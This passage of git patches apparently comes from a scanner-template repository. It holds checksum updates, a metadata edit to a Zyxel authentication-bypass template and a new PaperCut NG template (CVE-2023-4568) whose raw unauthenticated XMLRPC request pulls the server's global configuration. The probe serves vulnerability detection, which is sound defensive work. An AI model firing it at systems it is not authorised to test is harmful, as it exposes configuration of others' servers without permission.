-http/vulnerabilities/smartbi/smartbi-deserialization.yaml:c6de16a2797b36bbb738cb1395bd0707429b6fcc
+http/vulnerabilities/smartbi/smartbi-deserialization.yaml:681ea9aac79622a2f1f92d958906cda843232a80
 http/vulnerabilities/splash/splash-render-ssrf.yaml:ebc36380b220da7c0a2f6654da0706cc8cca1a9b
 http/vulnerabilities/spring/jolokia-logback-jndi-rce.yaml:e6cfb28d772af6be89abfaa2d7057e35d34d44dc
 http/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml:23a9d66f61a0d2e221d10633b36c41eaca9c6f9d
@@ -6777,14 +6778,14 @@ http/vulnerabilities/thinkphp/thinkphp-501-rce.yaml:43f190757d442c2aa7a0aaa76ffc
 http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml:077583bfac63986d89b0f015675c7d16c7c1866d
 http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:130d4c7b7e62bc968ef1418802166df675e65a32
 http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:b4084007e891dabf45821aab3bad769da49285af
-http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:47451d892c651c35b17fe6e33e01ea213be55f96
-http/vulnerabilities/tongda/tongda-api-file-upload.yaml:9f3675d01a4767cbc3f9ef74d2deeec7260bbf47
+http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:25f2cae42fcb5d920ceba8d8c00e929ca5c99a30
+http/vulnerabilities/tongda/tongda-api-file-upload.yaml:3ea1e57fc5925f8f9e7d894b24ae45c3983a2705
 http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:a8a1a777d23a7d3f8df0348193b6b9466a3852aa
 http/vulnerabilities/tongda/tongda-auth-bypass.yaml:ad7f8991b70d8626f046e282c306a58da79e9d80
 http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:2d4bb7f9a2ad74b64f8a2fbdf47a3bece2a22252
 http/vulnerabilities/tongda/tongda-getdata-rce.yaml:a73a59cf3f759bb3beff59c61959c8b6f88d8782
-http/vulnerabilities/tongda/tongda-getway-rfi.yaml:0a300cdb173e4a5c3f16ce5c5524cf5ec0690b15
-http/vulnerabilities/tongda/tongda-insert-sqli.yaml:959f9d2ca61dac8691d4730391efd2d4b5a63ac7
+http/vulnerabilities/tongda/tongda-getway-rfi.yaml:86b64643a9d27b48dec402c9b49a6ab5a7061629
+http/vulnerabilities/tongda/tongda-insert-sqli.yaml:0b777938db8bf95145c6ebbca35471df167ad364
 http/vulnerabilities/tongda/tongda-login-code-authbypass.yaml:dfa3b527ecea06b0571f6055ad9633401e056471
 http/vulnerabilities/tongda/tongda-meeting-unauth.yaml:a321424b18abe31c25b47436099012bca10ee5a6
 http/vulnerabilities/tongda/tongda-oa-swfupload-sqli.yaml:c2eea5392be483c7b63870582ad3d5592d352153
@@ -6793,7 +6794,7 @@ http/vulnerabilities/tongda/tongda-report-func-sqli.yaml:98460190adf8a3cdbb7ca5c
 http/vulnerabilities/tongda/tongda-session-disclosure.yaml:9ab8de0c9ba380229cb61d4f749eaafea23f64c7
 http/vulnerabilities/tongda/tongda-video-file-read.yaml:26dcb94fba52fefeff626733e6bf76225bee0566
 http/vulnerabilities/topsec/topsec-topacm-rce.yaml:c87fadea2b5535ee66a34a6d452f1ac02dbaa65a
-http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml:d8f2c29898a5223a7f913df5f67ef11ca44195fe
+http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml:1f3a2d05068cf7cfa9e0429e592c7ceceae36f82
 http/vulnerabilities/ueditor/ueditor-ssrf.yaml:59f1815fd6ff8314541d7c8b9a64766064ae2dcd
 http/vulnerabilities/ueditor/ueditor-xss.yaml:1f3fd8ac6e5c9609feb4fe1af9076cfc55a08e49
 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:0525410ad7ce820e401f4ccc287476aa53371b0e
@@ -6824,28 +6825,28 @@ http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.
 http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml:d2365b7d9e05b637a00890dc2e6123da13d812f9
 http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml:883c99908c9e6ba6a9f3c2ff770db9325c581cd9
 http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml:5a8687ea04fa86363e9b80705fc82ef7bf7e0a7f
-http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml:5dac231d8d44106c90263f0054970352b691448a
+http/vulnerabilities/weaver/ecology-verifyquicklogin-auth-bypass.yaml:e5772ed521730671794aeab7991cfe205cb9e3ee
 http/vulnerabilities/weaver/eoffice/weaver-eoffice-file-upload.yaml:b596abf62e41fc06ca8433f40ba1481c6ca04a46
 http/vulnerabilities/weaver/oa-v9-uploads-file.yaml:4f2e2a86334334b312281ca9e804aff5de3f2d47
 http/vulnerabilities/weaver/weaver-checkserver-sqli.yaml:2330b779ab6969c9bb48cefb135ebdf2067e70f9
-http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml:201af8269a05275a78f2cc15b4d33380a9ff1021
+http/vulnerabilities/weaver/weaver-e-cology-validate-sqli.yaml:a938f2c1c7bdce4c82eb8b4c27ac0d19fcac944e
 http/vulnerabilities/weaver/weaver-e-mobile-rce.yaml:c90b6c2be92e5ccc10e165b45cb9402d8eb9818c
-http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml:5232d4eeeb4d924e3d8d6b2aa2e133c5c886ec90
-http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml:4f98ed8b3cd0d8c30550fe9f2acf5daf5cb90481
+http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml:2c247a4c33aec2a4a870a6b09a4a2c5599d0b06f
+http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml:0ac1692379f5ea6119ac0ba4650ec6f1de6513c3
 http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml:7eff295385c5b8ae647f97529e9b184aae488ab9
 http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml:19032d48c04c1b62e9933766c467d0bec612a191
-http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml:c63c29f70b599d39b058b7d3fe1fb2ffc51a70aa
-http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml:a0b32a94e97ef8af2c7f3846270609270f0b2975
+http/vulnerabilities/weaver/weaver-group-xml-sqli.yaml:6c43f966b37afe88ef49a2c95103b09e3eda1dff
+http/vulnerabilities/weaver/weaver-jquery-file-upload.yaml:18d19b73f4d96af29591c0c0b2e8491506d9ce88
 http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml:bdfe7e87cc5e3148a954db01151eb37ee12cfcf6
-http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml:cffb69e39876c376a3c1a2f6c1e64526f5c2fe27
-http/vulnerabilities/weaver/weaver-login-sessionkey.yaml:69d024fc7db352b4adad3e5f6b8f1657b09d9600
+http/vulnerabilities/weaver/weaver-lazyuploadify-file-upload.yaml:3e4c48cc8ca0e4096e1bd8f5e3831c9ecd2279e7
+http/vulnerabilities/weaver/weaver-login-sessionkey.yaml:6be0cdce948fe6d76b7646e15c9b7c9262a4bd0d
 http/vulnerabilities/weaver/weaver-mysql-config-info-leak.yaml:ca68e5bcb398d8e8e6f935d4fa9a49dd2649e61f
-http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml:51eebced18af7fc6ea1fa4381963b2b6173c488c
+http/vulnerabilities/weaver/weaver-office-server-file-upload.yaml:db07d34528606b2f24132cb29bba72d1954d240d
 http/vulnerabilities/weaver/weaver-officeserver-lfi.yaml:d6ad9700c46a3338469274811a4bf20118b262f2
 http/vulnerabilities/weaver/weaver-signaturedownload-lfi.yaml:847df800aa8addc484e1af216c5aaa7eac938ec1
 http/vulnerabilities/weaver/weaver-sptmforportalthumbnail-lfi.yaml:4c76db9cf38b9ed9045f12c87a13cda4f2683655
-http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:9b1ae29722f532c60067309a332d6c15e4b1fb0b
-http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml:6e204dd6196d40a46cb082bc583f17541acacf05
+http/vulnerabilities/weaver/weaver-uploadify-file-upload.yaml:52380273a38d99ddc4c7c9e522a87a930d955a34
+http/vulnerabilities/weaver/weaver-uploadoperation-file-upload.yaml:3c3d9d137d2344da959a0f22ee6a6cd42d2ca843
 http/vulnerabilities/weaver/weaver-userselect-unauth.yaml:75455582d8ea35f3ada4fb5dd4f8667e5f239b70
 http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:d1f9ee70aae38699a3002ec5e02073fba05af3ea
 http/vulnerabilities/wechat/wechat-info-leak.yaml:d7ea85dc1c11def732c93cf36d72fdafc3892304
@@ -7014,17 +7015,16 @@ http/vulnerabilities/yonyou/chanjet-gnremote-sqli.yaml:e84c6a43591f387d35f294cc5
 http/vulnerabilities/yonyou/chanjet-tplus-checkmutex-sqli.yaml:7416627bb060c5a443d0da18416809d7576a9efa
 http/vulnerabilities/yonyou/chanjet-tplus-file-read.yaml:79379dad0faf98aa977877f3ab3e14cf86ed3bc6
 http/vulnerabilities/yonyou/chanjet-tplus-fileupload.yaml:af883dc5b8711d83ca2e4a5b798f80241c6d47c7
-http/vulnerabilities/yonyou/chanjet-tplus-rce.yaml:16ea8e8ba575c39bc5ebd781a2ec463376aed3c8
 http/vulnerabilities/yonyou/chanjet-tplus-ufida-sqli.yaml:d4b9a4ed83d71e51352c6bfa69e5f4f10fd0b906
 http/vulnerabilities/yonyou/erp-nc-directory-traversal.yaml:82c982f899ffeb1dc9ee409a10191f7436dedd46
 http/vulnerabilities/yonyou/grp-u8-uploadfiledata-fileupload.yaml:056f66c3d560c8072c05fcac027511a92ca4ece3
 http/vulnerabilities/yonyou/wooyun-path-traversal.yaml:9e57b135c251528e960e3a620a55778cb5b75f43
-http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:49a38ee1972eeeea8a2982e299b7d70b01cdb253
-http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:dcacf81350b023ed4c36db5f153d56f4902faac7
-http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:a784cd370301919c8311f72cd72c1ce72353333c
+http/vulnerabilities/yonyou/yonyou-fe-directory-traversal.yaml:dcfe2b8bb2c726a9b518c5c860a94dc4a860760a
+http/vulnerabilities/yonyou/yonyou-filereceiveservlet-fileupload.yaml:528610941f90c3f645e471e267cd4dbd828a2fe8
+http/vulnerabilities/yonyou/yonyou-grp-u8-xxe.yaml:4fb5c130df2a4ce3fac9f075eeeb9539a5eadb7c
 http/vulnerabilities/yonyou/yonyou-nc-accept-fileupload.yaml:d425f0b6ed4fb12f6718c0cc378381fa0c7fd751
 http/vulnerabilities/yonyou/yonyou-nc-baseapp-deserialization.yaml:d3218dbf2b9d30bb1703168b16d66e895918b803
-http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:e226605eccccdff5bd9aaf586b6ce6e25497ca15
+http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileupload.yaml:11294f83f5bdaa020d2ba94440b93cbc0469c41d
 http/vulnerabilities/yonyou/yonyou-nc-grouptemplet-fileupload.yaml:c58cb21936813e633196368e5216932756501c2d
 http/vulnerabilities/yonyou/yonyou-nc-info-leak.yaml:6a325f6a45baebdac3c4652c2cf6483d7d67ad6a
 http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:9eb7a48b10cd1cd5c7c4cf12d9402a2aab9c899c
@@ -7179,7 +7179,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:a3f9a0c229ba7f886a9e79b7f447f5f82e96005a
+templates-checksum.txt:8266761c847221d8de6111168552f63f2662b8f2
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 18f37d922690c145f1f94cb310f75f28cea27f40 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Mon, 18 Sep 2023 18:51:11 +0530
Subject: [PATCH 0433/1090] Update CVE-2022-0342.yaml

---
 http/cves/2022/CVE-2022-0342.yaml | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/http/cves/2022/CVE-2022-0342.yaml b/http/cves/2022/CVE-2022-0342.yaml
index 82c34a349f..cf0bc52b82 100644
--- a/http/cves/2022/CVE-2022-0342.yaml
+++ b/http/cves/2022/CVE-2022-0342.yaml
@@ -2,12 +2,12 @@ id: CVE-2022-0342
 
 info:
   name: Zyxel - Authentication Bypass
-  author: SleepingBag945
+  author: SleepingBag945,Powerexploit
   severity: critical
   description: |
      An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
   reference:
-    - https://github.com/gobysec/GobyVuls/blob/3dbd252ebd78dfadf3fa6d99abfbbba79908d6e3/CVE-2022-0342.md?plain=1
+    - https://github.com/gobysec/GobyVuls/blob/master/CVE-2022-0342.md
     - https://nvd.nist.gov/vuln/detail/CVE-2022-0342
   metadata:
     max-request: 1
@@ -37,4 +37,4 @@ http:
 
       - type: status
         status:
-          - 200
\ No newline at end of file
+          - 200

From e423b076f2c6b2cbadf83e7353d250743458bfc8 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 13:26:13 +0000
Subject: [PATCH 0435/1090] Auto Generated Templates Checksum [Mon Sep 18
 13:26:13 UTC 2023] :robot:

---
 templates-checksum.txt | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index d61b247026..0a7f227fd9 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2064,7 +2064,7 @@ http/cves/2022/CVE-2022-0234.yaml:2d7260c3732633356837bc0f079db94065dd3269
 http/cves/2022/CVE-2022-0271.yaml:391665cb6b9f508cd44bff1bbbc2837976da4191
 http/cves/2022/CVE-2022-0281.yaml:0db781606d4f136874570f1c773bd9427ae68376
 http/cves/2022/CVE-2022-0288.yaml:819f8dbbdb80759d72a8075856fc0e46084ac72d
-http/cves/2022/CVE-2022-0342.yaml:1b8ce29c4367f437f277fb624f34d60decaaaf6f
+http/cves/2022/CVE-2022-0342.yaml:4d77525467a6c26a397220731b6c86f193e0d6de
 http/cves/2022/CVE-2022-0346.yaml:2f04269879b5048396af9ee99f32dcc636d21a76
 http/cves/2022/CVE-2022-0349.yaml:2691cb6a3ae74ebf3eb5e5f6fb0c497809b0e2f9
 http/cves/2022/CVE-2022-0378.yaml:401072c7cb325c756d294908be134a6dbb28b106
@@ -7179,7 +7179,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:8266761c847221d8de6111168552f63f2662b8f2
+templates-checksum.txt:12579d9a1630c352f6bd03fb5b315b54c10b4471
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 681a1b3263820f54caeb4fb11f97f5eae9ede0ef Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Mon, 18 Sep 2023 23:06:47 +0530
Subject: [PATCH 0436/1090] Create CVE-2023-4568.yaml

---
 http/cves/2023/CVE-2023-4568.yaml | 53 +++++++++++++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-4568.yaml

diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml
new file mode 100644
index 0000000000..bd01f96b1e
--- /dev/null
+++ b/http/cves/2023/CVE-2023-4568.yaml
@@ -0,0 +1,53 @@
+id: CVE-2023-4568
+
+info:
+  name: PaperCut NG Unauthenticated XMLRPC Functionality
+  author: DhiyaneshDK
+  severity: medium
+  description: |
+    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
+    - https://www.tenable.com/security/research/tra-2023-31
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+    cvss-score: 6.5
+    cve-id: CVE-2023-4568
+    cwe-id: CWE-287
+    epss-score: 0.00046
+    epss-percentile: 0.14237
+    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: papercut
+    product: papercut_ng
+    shodan-query: html:"content="PaperCut""
+  tags: cve,cve2023,unauth,papercut
+
+http:
+  - raw:
+      - |
+        POST /rpc/clients/xmlrpc HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type:text/xml
+
+        client.getGlobalConfigstr1str2
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'conf.ssl-port'
+          - 'conf.auth-ttl-default'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/xml
+
+      - type: status
+        status:
+          - 200

From 335446780c95612888e6abde79e0a7c9c7c5a409 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Mon, 18 Sep 2023 17:37:35 +0000
Subject: [PATCH 0437/1090] Auto Generated Templates Stats [Mon Sep 18 17:37:35
 UTC 2023] :robot:

---
 TEMPLATES-STATS.json |    2 +-
 TEMPLATES-STATS.md   | 7348 +++++++++++++++++++++---------------------
 TOP-10.md            |   16 +-
 3 files changed, 3710 insertions(+), 3656 deletions(-)

diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json
index 723d49b992..6ced8098ff 100644
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
@@ -1 +1 @@
-{"tags":[{"name":"cve","count":2054},{"name":"panel","count":985},{"name":"wordpress","count":831},{"name":"exposure","count":784},{"name":"xss","count":726},{"name":"wp-plugin","count":721},{"name":"osint","count":672},{"name":"tech","count":632},{"name":"edb","count":598},{"name":"lfi","count":587},{"name":"misconfig","count":509},{"name":"rce","count":467},{"name":"packetstorm","count":446},{"name":"cve2021","count":442},{"name":"cve2022","count":430},{"name":"wpscan","count":382},{"name":"wp","count":330},{"name":"file","count":318},{"name":"unauth","count":297},{"name":"authenticated","count":253},{"name":"cve2020","count":248},{"name":"token-spray","count":241},{"name":"sqli","count":233},{"name":"kev","count":217},{"name":"top-200","count":212},{"name":"osint-social","count":210},{"name":"config","count":200},{"name":"","count":195},{"name":"token","count":193},{"name":"oast","count":183},{"name":"cve2023","count":174},{"name":"intrusive","count":169},{"name":"login","count":162},{"name":"default-login","count":161},{"name":"iot","count":159},{"name":"cve2018","count":157},{"name":"apache","count":157},{"name":"cve2019","count":156},{"name":"joomla","count":137},{"name":"malware","count":131},{"name":"redirect","count":118},{"name":"detect","count":116},{"name":"cve2010","count":112},{"name":"network","count":105},{"name":"files","count":104},{"name":"ssrf","count":101},{"name":"top-100","count":100},{"name":"auth-bypass","count":99},{"name":"router","count":99},{"name":"cms","count":98},{"name":"cve2017","count":80},{"name":"disclosure","count":78},{"name":"devops","count":77},{"name":"takeover","count":75},{"name":"install","count":72},{"name":"seclists","count":70},{"name":"oracle","count":66},{"name":"oss","count":61},{"name":"fileupload","count":56},{"name":"cisco","count":56},{"name":"adobe","count":55},{"name":"cve2015","count":55},{"name":"cve2016","count":54},{"name":"google","count":53},{"name":"tokens","count":52},{"name":"atlassian","count":48},{"name":"logs","count":46},{"name":"tenable","count":46},{"name":"osint-gaming","count":45},{"name":"huntr","count":45},{"name":"vmware","count":45},{"name":"vulhub","count":44},{"name":"debug","count":44},{"name":"aem","count":44},{"name":"hackerone","count":43},{"name":"osint-hobby","count":42},{"name":"c2","count":42},{"name":"plugin","count":42},{"name":"cve2014","count":42},{"name":"osint-porn","count":42},{"name":"generic","count":41},{"name":"springboot","count":38},{"name":"traversal","count":37},{"name":"jira","count":36},{"name":"aws","count":35},{"name":"kubernetes","count":35},{"name":"listing","count":35},{"name":"osint-misc","count":35},{"name":"injection","count":35},{"name":"misc","count":35},{"name":"cnvd","count":34},{"name":"ir","count":33},{"name":"deserialization","count":32},{"name":"osint-coding","count":30},{"name":"sap","count":29},{"name":"php","count":29},{"name":"log4j","count":29},{"name":"fuzz","count":28},{"name":"osint-tech","count":28},{"name":"gitlab","count":27},{"name":"api","count":27},{"name":"microsoft","count":26},{"name":"jndi","count":26},{"name":"cve2012","count":26},{"name":"proxy","count":25},{"name":"k8s","count":25},{"name":"osint-finance","count":24},{"name":"osint-shopping","count":24},{"name":"osint-business","count":24},{"name":"manageengine","count":24},{"name":"osint-images","count":24},{"name":"firewall","count":24},{"name":"stored-xss","count":23},{"name":"amazon","count":23},{"name":"wp-theme","count":23},{"name":"zoho","count":23},{"name":"keys","count":22},{"name":"cloud","count":21},{"name":"dlink","count":21},{"name":"tomcat","count":21},{"name":"weblogic","count":21},{"name":"msf","count":21},{"name":"ibm","count":21},{"name":"fortinet","count":20},{"name":"cicd","count":20},{"name":"github","count":20},{"name":"ssl","count":20},{"name":"camera","count":20},{"name":"admin","count":20},{"name":"lfr","count":19},{"name":"struts","count":19},{"name":"jenkins","count":19},{"name":"dns","count":19},{"name":"rukovoditel","count":19},{"name":"ftp","count":18},{"name":"printer","count":18},{"name":"wavlink","count":18},{"name":"service","count":18},{"name":"grafana","count":18},{"name":"osint-music","count":18},{"name":"xxe","count":17},{"name":"nginx","count":17},{"name":"cve2011","count":17},{"name":"backup","count":16},{"name":"cve2009","count":16},{"name":"citrix","count":16},{"name":"osint-blog","count":16},{"name":"jarm","count":15},{"name":"cve2008","count":15},{"name":"android","count":15},{"name":"status","count":15},{"name":"hp","count":15},{"name":"magento","count":15},{"name":"java","count":15},{"name":"confluence","count":14},{"name":"coldfusion","count":14},{"name":"domainmod","count":14},{"name":"cve2013","count":14},{"name":"npm","count":14},{"name":"zyxel","count":14},{"name":"osint-health","count":14},{"name":"jboss","count":14},{"name":"mail","count":14},{"name":"woocommerce","count":14},{"name":"osint-art","count":14},{"name":"audit","count":14},{"name":"nodejs","count":14},{"name":"enum","count":14},{"name":"cnvd2021","count":14},{"name":"osint-dating","count":13},{"name":"bypass","count":13},{"name":"osint-political","count":13},{"name":"airflow","count":13},{"name":"creds-stuffing","count":13},{"name":"login-check","count":13},{"name":"azure","count":13},{"name":"fortigate","count":13},{"name":"vpn","count":13},{"name":"laravel","count":13},{"name":"abstractapi","count":13},{"name":"ruijie","count":13},{"name":"cuppa","count":13},{"name":"dell","count":12},{"name":"dashboard","count":12},{"name":"graphql","count":12},{"name":"sonicwall","count":12},{"name":"alibaba","count":12},{"name":"kafka","count":12},{"name":"rails","count":12},{"name":"ruby","count":12},{"name":"netgear","count":12},{"name":"git","count":12},{"name":"microweber","count":12},{"name":"backdoor","count":12},{"name":"zimbra","count":12},{"name":"webserver","count":12},{"name":"drupal","count":12},{"name":"auth","count":12},{"name":"netsweeper","count":12},{"name":"online-fire-reporting","count":11},{"name":"spring","count":11},{"name":"xstream","count":11},{"name":"setup","count":11},{"name":"ecology","count":11},{"name":"docker","count":11},{"name":"phpmyadmin","count":11},{"name":"osint-video","count":11},{"name":"fastjson","count":10},{"name":"redis","count":10},{"name":"headless","count":10},{"name":"digitalocean","count":10},{"name":"jolokia","count":10},{"name":"symfony","count":10},{"name":"django","count":10},{"name":"prometheus","count":10},{"name":"ssti","count":10},{"name":"solarview","count":10},{"name":"db","count":10},{"name":"icewarp","count":10},{"name":"node","count":10},{"name":"ssh","count":10},{"name":"thinkphp","count":10},{"name":"dedecms","count":10},{"name":"windows","count":10},{"name":"glpi","count":10},{"name":"wso2","count":9},{"name":"zabbix","count":9},{"name":"versa","count":9},{"name":"elasticsearch","count":9},{"name":"opencats","count":9},{"name":"firebase","count":9},{"name":"vcenter","count":9},{"name":"solr","count":9},{"name":"installer","count":9},{"name":"prestashop","count":9},{"name":"gitea","count":9},{"name":"bitbucket","count":9},{"name":"cnvd2020","count":9},{"name":"scada","count":9},{"name":"druid","count":9},{"name":"pfsense","count":9},{"name":"cache","count":9},{"name":"kube","count":9},{"name":"sitecore","count":9},{"name":"jetbrains","count":8},{"name":"hikvision","count":8},{"name":"smtp","count":8},{"name":"osint-news","count":8},{"name":"atom","count":8},{"name":"mirai","count":8},{"name":"exchange","count":8},{"name":"metadata","count":8},{"name":"emerge","count":8},{"name":"vbulletin","count":8},{"name":"console","count":8},{"name":"manager","count":8},{"name":"oauth","count":8},{"name":"spotweb","count":8},{"name":"unauthenticated","count":8},{"name":"recon","count":8},{"name":"hms","count":8},{"name":"ognl","count":8},{"name":"default-page","count":8},{"name":"config-audit","count":8},{"name":"bucket","count":8},{"name":"crlf","count":8},{"name":"cisco-switch","count":8},{"name":"iis","count":8},{"name":"hashicorp","count":7},{"name":"blind","count":7},{"name":"ivanti","count":7},{"name":"mobileiron","count":7},{"name":"vms","count":7},{"name":"seeyon","count":7},{"name":"maps","count":7},{"name":"samsung","count":7},{"name":"squirrelmail","count":7},{"name":"facebook","count":7},{"name":"fortios","count":7},{"name":"gogs","count":7},{"name":"nagios","count":7},{"name":"huawei","count":7},{"name":"nacos","count":7},{"name":"blockchain","count":7},{"name":"go","count":7},{"name":"shopify","count":7},{"name":"rconfig","count":7},{"name":"odoo","count":7},{"name":"secret","count":7},{"name":"nagiosxi","count":7},{"name":"oa","count":7},{"name":"ec2","count":7},{"name":"ofbiz","count":7},{"name":"discord","count":7},{"name":"dropbox","count":7},{"name":"sangfor","count":7},{"name":"error","count":7},{"name":"avtech","count":7},{"name":"websphere","count":7},{"name":"sophos","count":7},{"name":"liferay","count":6},{"name":"plesk","count":6},{"name":"s3","count":6},{"name":"newrelic","count":6},{"name":"pmb","count":6},{"name":"bigip","count":6},{"name":"jamf","count":6},{"name":"leak","count":6},{"name":"opensis","count":6},{"name":"artica","count":6},{"name":"mongodb","count":6},{"name":"74cms","count":6},{"name":"webmin","count":6},{"name":"jetty","count":6},{"name":"doctor-appointment-system","count":6},{"name":"tikiwiki","count":6},{"name":"symantec","count":6},{"name":"jeecg","count":6},{"name":"sonarqube","count":6},{"name":"elfinder","count":6},{"name":"microstrategy","count":6},{"name":"database","count":6},{"name":"keycloak","count":6},{"name":"activemq","count":6},{"name":"openvpn","count":6},{"name":"zhiyuan","count":6},{"name":"moodle","count":6},{"name":"fpd","count":6},{"name":"slack","count":6},{"name":"cacti","count":6},{"name":"cobbler","count":6},{"name":"flutterwave","count":6},{"name":"magmi","count":6},{"name":"filemanager","count":6},{"name":"lucee","count":6},{"name":"nexus","count":6},{"name":"solarwinds","count":6},{"name":"minio","count":6},{"name":"python","count":6},{"name":"kubelet","count":6},{"name":"akamai","count":5},{"name":"jupyter","count":5},{"name":"elastic","count":5},{"name":"microfocus","count":5},{"name":"xmlrpc","count":5},{"name":"asana","count":5},{"name":"asp","count":5},{"name":"adminer","count":5},{"name":"cockpit","count":5},{"name":"sql","count":5},{"name":"square","count":5},{"name":"hybris","count":5},{"name":"terramaster","count":5},{"name":"typo3","count":5},{"name":"resin","count":5},{"name":"strapi","count":5},{"name":"caucho","count":5},{"name":"parallels","count":5},{"name":"firmware","count":5},{"name":"storage","count":5},{"name":"bmc","count":5},{"name":"circarlife","count":5},{"name":"zzzcms","count":5},{"name":"rseenet","count":5},{"name":"geoserver","count":5},{"name":"avideo","count":5},{"name":"paypal","count":5},{"name":"web3","count":5},{"name":"instrusive","count":5},{"name":"vrealize","count":5},{"name":"rfi","count":5},{"name":"server","count":5},{"name":"kkfileview","count":5},{"name":"jwt","count":5},{"name":"fatpipe","count":5},{"name":"openemr","count":5},{"name":"couchdb","count":5},{"name":"heroku","count":5},{"name":"metinfo","count":5},{"name":"ethereum","count":5},{"name":"tenda","count":5},{"name":"phpinfo","count":5},{"name":"apisix","count":5},{"name":"gocd","count":5},{"name":"avaya","count":5},{"name":"carrental","count":5},{"name":"awstats","count":5},{"name":"ruckus","count":5},{"name":"mailchimp","count":4},{"name":"mikrotik","count":4},{"name":"cnvd2019","count":4},{"name":"finicity","count":4},{"name":"log","count":4},{"name":"metasploit","count":4},{"name":"jellyfin","count":4},{"name":"javascript","count":4},{"name":"wcs","count":4},{"name":"datadog","count":4},{"name":"artifactory","count":4},{"name":"candidats","count":4},{"name":"spark","count":4},{"name":"pixie","count":4},{"name":"dropbear","count":4},{"name":"zend","count":4},{"name":"umbraco","count":4},{"name":"metabase","count":4},{"name":"httpserver","count":4},{"name":"aspose","count":4},{"name":"file-upload","count":4},{"name":"casaos","count":4},{"name":"photo","